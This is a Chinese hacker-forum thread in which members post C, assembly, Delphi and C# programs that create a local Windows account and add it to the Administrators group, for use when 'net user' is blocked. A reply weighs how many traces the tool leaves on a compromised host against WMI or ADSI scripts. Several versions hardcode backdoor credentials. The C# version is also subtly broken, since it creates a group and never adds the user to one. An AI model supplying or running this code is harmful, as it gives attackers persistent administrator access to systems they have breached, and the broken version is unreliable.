[原创]使用API添加用户的小程序 当net user不能使用时 TRY
文章作者:pt007[at]vip.sina.com信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])
[b]注:文章首发[url=http://blog.csdn.net/I_S_T_O]I.S.T.O信息安全团队[/url],后由原创作者友情提交到邪恶八进制信息安全团队技术讨论组。I.S.T.O版权所有,转载需注明作者。[/b]
[language=c]#ifndef UNICODE
#define UNICODE
#endif
#include <stdio.h>
#include <windows.h>
#include <lm.h>
#pragma comment(lib,"netapi32")
int Usage(wchar_t *);
int wmain(int argc, wchar_t *argv[])
{
USER_INFO_1 ui;
DWORD dwError = 0;
if(argc!=3)
{
//fwprintf(stderr,L"usage:%s test11 test123\n",argv[0]);
Usage(argv[0]);
return 0;
}
ui.usri1_name = argv[1];
ui.usri1_password = argv[2];
ui.usri1_priv = USER_PRIV_USER;
ui.usri1_home_dir = NULL;
ui.usri1_comment = NULL;
ui.usri1_flags = UF_SCRIPT;
ui.usri1_script_path = NULL;
//添加名为test11的用户,密码为Test!@#123:
if(NetUserAdd(NULL, 1, (LPBYTE)&ui, &dwError) == NERR_Success)
{
//添加成功
fwprintf(stderr, L"User [%s] has been successfully added,password is [%s]\n",
argv[1], argv[2]);
}
else
{
//添加失败
fwprintf(stderr, L"Add user %s Error!\n",argv[1]);
return 1;
}
wchar_t szAccountName[100]={0}; //字符数组清0
const unsigned short *name;
name=(const unsigned short *)argv[1];
wcscpy(szAccountName,name); //szAccountName=test11
LOCALGROUP_MEMBERS_INFO_3 account;
account.lgrmi3_domainandname=szAccountName;
//把test11添加到Administrators组
if( NetLocalGroupAddMembers(NULL,L"Administrators",3,(LPBYTE)&account,1) == NERR_Success )
{
//添加成功
printf("Add to Administrators success.\n");
return 0;
}
else
{
//添加失败
printf("Add to Administrators Fail!\n");
return 1;
}
}
//输出帮助的典型方法:
int Usage (wchar_t *username)
{
fprintf(stdout,"===============================================================================\n"
"\t名称:使用API添加用户的小程序\n"
"\t作者:[email]pt007@vip.sina.com[/email]\n"
"\t团队: I.S.T.O信息安全团队([url]http://blog.csdn.net/I_S_T_O[/url])\n"
"\tQQ: 7491805\n"
"\t声明:本软件由pt007原创,转载请注明出处,谢谢!\n");
fwprintf(stdout,L"\texample: %s test11 test123\n",username);
fprintf(stdout,"===============================================================================\n");
return 1;
}[/language] 汗~~ 这么多时间!咋就不帮偶写个JNI的DLL 还有SO 插入平台特有的功能到JSP里面! [quote]引用第1楼kj021320于2007-11-21 16:43发表的 :
汗~~ 这么多时间!咋就不帮偶写个JNI的DLL 还有SO 插入平台特有的功能到JSP里面![/quote]
我试试吧,就是不知道怎么入手。 [s:270] 我是这样想的,如果主机很BT,net都不能用,你说用WMI或者ADSI的脚本,与选择用这个程序,综合痕量一下。 ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;code by asm [url]http://www.asm32.cn/[/url]
;2007-9-29
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.386
.model flat, stdcall
option casemap :none ; case sensitive
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Include 数据
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
include windows.inc
include user32.inc
include kernel32.inc
include netapi32.inc
includelib user32.lib
includelib kernel32.lib
includelib netapi32.lib
.data?
oUserInfo USER_INFO_1<?>
oUser LOCALGROUP_MEMBERS_INFO_3 <?>
dwErr DWORD ?
.data
szUser dw "a","s","m",0
szPass dw "p","a","s","s",0
szAdministrators dw "A","d","m","i","n","i","s","t","r","a","t","o","r","s",0
.code
start:
push USER_INFO_1
push offset oUserInfo
call RtlZeroMemory
push offset szUser
pop oUserInfo.usri1_name
push offset szPass
pop oUserInfo.usri1_password
mov oUserInfo.usri1_priv,USER_PRIV_USER
mov oUserInfo.usri1_flags,UF_NORMAL_ACCOUNT
push offset dwErr
push offset oUserInfo
push 1
push NULL
call NetUserAdd
push oUserInfo.usri1_name
pop oUser.lgrmi3_domainandname
push 1
push offset oUser
push 3
push offset szAdministrators
push NULL
call NetLocalGroupAddMembers
mov eax,0
push eax
call ExitProcess
end start
[s:265]
user:asm
pass:pass mov eax,0
push eax
call ExitProcess
[s:289] 太深奥了...看不懂... LS的:传参数哈,第一个参数:NULL asm有个特点 [s:264] 最喜欢用asm砸人 哈哈 添加一个 用户名:EvilOctal 密码:password
程序大小:1KB
[language=asm]
.486
.model flat,stdcall
option casemap:none
include windows.inc
include Strings.mac
include netapi32.inc
include kernel32.inc
includelib netapi32.lib
includelib kernel32.lib
.data?
oUserInfo USER_INFO_1 <?>
oUser LOCALGROUP_MEMBERS_INFO_3 <?>
dwErr DWORD ?
.code
start:
invoke RtlZeroMemory,addr oUserInfo,sizeof USE_INFO_1
mov eax,$CTW0("EvilOctal")
mov oUserInfo.usri1_name,eax
mov eax,$CTW0("password")
mov oUserInfo.usri1_password,eax
mov oUserInfo.usri1_priv,USER_PRIV_USER
mov oUserInfo.usri1_flags,UF_NORMAL_ACCOUNT
invoke NetUserAdd,NULL,1,addr oUserInfo,addr dwErr
push oUserInfo.usri1_name
pop oUser.lgrmi3_domainandname
invoke NetLocalGroupAddMembers,NULL,$CTW0("Administrators"),3,addr oUser,1
invoke ExitProcess,0
end start
[/language]
貌似楼主的代码大部分拷贝MSDN上的 NetUserAdd API的示例代码 [code] .486.model flat,stdcalloption casemap:none include windows.incinclude Strings.macinclude netapi32.incinclude kernel32.incincludelib netapi32.libincludelib kernel32.lib .data?oUserInfo USER_INFO_1 <?>oUser LOCALGROUP_MEMBERS_INFO_3 <?>dwErr DWORD ? .codestart:invoke RtlZeroMemory,addr oUserInfo,sizeof USE_INFO_1mov eax,$CTW0("EvilOctal") mov oUserInfo.usri1_name,eaxmov eax,$CTW0("password") mov oUserInfo.usri1_password,eaxmov oUserInfo.usri1_priv,USER_PRIV_USERmov oUserInfo.usri1_flags,UF_NORMAL_ACCOUNTinvoke NetUserAdd,NULL,1,addr oUserInfo,addr dwErrpush oUserInfo.usri1_namepop oUser.lgrmi3_domainandnameinvoke NetLocalGroupAddMembers,NULL,$CTW0("Administrators"),3,addr oUser,1invoke ExitProcess,0end start[/code]MS 和 ASM 相似啊 [quote]引用第6楼xi4oyu于2007-11-21 23:36发表的 :
LS的:传参数哈,第一个参数:NULL[/quote]
可是为什么 不是
push 0
call exitprocess
呢? 百思不得其解啊.... [quote]引用第10楼洋洋洒洒于2007-11-22 13:49发表的 :
可是为什么 不是
push 0
call exitprocess
.......[/quote]
所以我把他的代码简化了下。。。 [quote]引用第10楼洋洋洒洒于2007-11-22 13:49发表的 :
可是为什么 不是
push 0
call exitprocess
.......[/quote]
手误,手误 [s:265] delphi 版的
----------------------------------------------------------
program adduser;
{$APPTYPE CONSOLE}
uses
windows;
type USER_INFO_1=record
usri1_name:pwidechar;
usri1_password:pwidechar;
usri1_password_age:dword;
usri1_priv:dword;
usri1_home_dir:pwidechar;
usri1_comment:pwidechar;
usri1_flags:dword;
usri1_script_path:pwidechar;
end;
buffer=^USER_INFO_1;
type
_LOCALGROUP_MEMBERS_INFO_3 = record
lgrmi3_domainandname: PWideChar;
end;
function NetUserAdd(Server:PWideChar;Level:DWORD;Buf:pointer;ParmError:dword):LongInt;
stdcall; external 'netapi32.dll';
function NetLocalGroupAddMembers(Server, GroupName: PWideChar; Level:Cardinal;
var MemsBuf; TotalEntries: Cardinal): Integer; stdcall; external 'netapi32.dll';
var
buf:buffer;
error:Cardinal;
user,pass:WideString;
members: _LOCALGROUP_MEMBERS_INFO_3;
begin
if paramstr(1)<>'' then
begin
user:=paramstr(1);
pass:=paramstr(2);
getmem(buf,sizeof(USER_INFO_1));
with buf^ do
begin
usri1_name:=PWideChar(user);
usri1_password:=PWideChar(pass);
usri1_password_age:=0;
usri1_priv:=1;
usri1_home_dir:=nil;
usri1_comment:=nil;
usri1_flags:=1;
usri1_script_path:=nil;
end;
if NetUserAdd(nil,1,pointer(buf), error)=0 then
writeln(paramstr(1)+' 添加成功!') else
writeln(paramstr(1)+' 添加失败!');
freemem(buf);
Members.lgrmi3_domainandname := PWideChar(user);
if NetLocalGroupAddMembers(nil, 'Administrators', 3, Members, 1)=0 then
writeln(paramstr(1)+' 添加到管理员组成功!') else
writeln(paramstr(1)+' 添加到管理员组添加失败!');
end else
begin
writeln('舍我其谁 QQ:303428402');
writeln('example:'+#13#10+'adduser.exe '+'username'+' '+'password');
----------------------------------------------------------
end;
end. 再给个我写的C#版本的
Windows Vista Home Premium
VS 2005
Net 2.0 下编译通过
用户名:Delphiscn 密码:EvilOctal
[code]
using System.Runtime.InteropServices;
using Microsoft.Win32;
using System;
namespace Task
{
class AddUserApplication
{
[DllImport("Netapi32.dll")]
extern static int NetUserAdd([MarshalAs(UnmanagedType.LPTStr)] string servername, int level, ref USER_INFO_1 buf, int parm_err);
[DllImport("Netapi32.dll")]
extern static int NetLocalGroupAdd([MarshalAs(UnmanagedType.LPTStr)] string servername, int level, ref LOCALGROUP_INFO_1 buf, int parm_err);
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public struct USER_INFO_1
{
public string user_information_1_name;
public string user_information_1_password;
public string user_information_1_password_age;
public int user_information_1_priv;
public string user_information_1_home_dir;
public string comment;
public int user_information_1_flags;
public string user_information_1_script_path;
}
public struct LOCALGROUP_INFO_1
{
[MarshalAs(UnmanagedType.LPWStr)]public string Add_localgroup_1_name;
[MarshalAs(UnmanagedType.LPWStr)]public string Add_localgroup_1_comment;
}
public static void Main()
{
if ((Add_a_User_Account())==false )
{
Console.Write("Error: Adding User Failed Sorry");
}
else
Add_a_UserAccount_to_LocalGroup();
}
//public static void Usage()
//{
//Console.Write("------------------------------------");
//Console.Write("Code BY Delphiscn 2008-01-28");
//Console.Write("Email:Delphiscn@gmail.com");
//Console.Write("Blog: [url]http://blog.csdn.net/delphiscn[/url]");
//Console.Write("------------------------------------");
//}
public static Boolean Add_a_User_Account()
{
USER_INFO_1 AddUser = new USER_INFO_1();
AddUser.user_information_1_name = "Delphiscn";
AddUser.user_information_1_password = "EvilOctal";
AddUser.user_information_1_priv = 1;
AddUser.user_information_1_home_dir = null;
AddUser.comment = "Add a User Named Delphiscn";
AddUser.user_information_1_script_path = null;
if (NetUserAdd(null, 1, ref AddUser, 0) != 0)
{
Console.Write("Error: Adding User Failed");
return false;
}
return true;
}
public static void Add_a_UserAccount_to_LocalGroup()
{
LOCALGROUP_INFO_1 AddToGroup= new LOCALGROUP_INFO_1();
AddToGroup.Add_localgroup_1_name = "Administrators";
AddToGroup.Add_localgroup_1_comment = "Add a User to the Administrators Group";
if (NetLocalGroupAdd(null, 1, ref AddToGroup , 0) != 0)
{
Console.Write("Adding To the Administrators Group Failed");
}
}
}
}
[/code] 看C#就晕...
还是用我的VC++ -_-
页:
[1]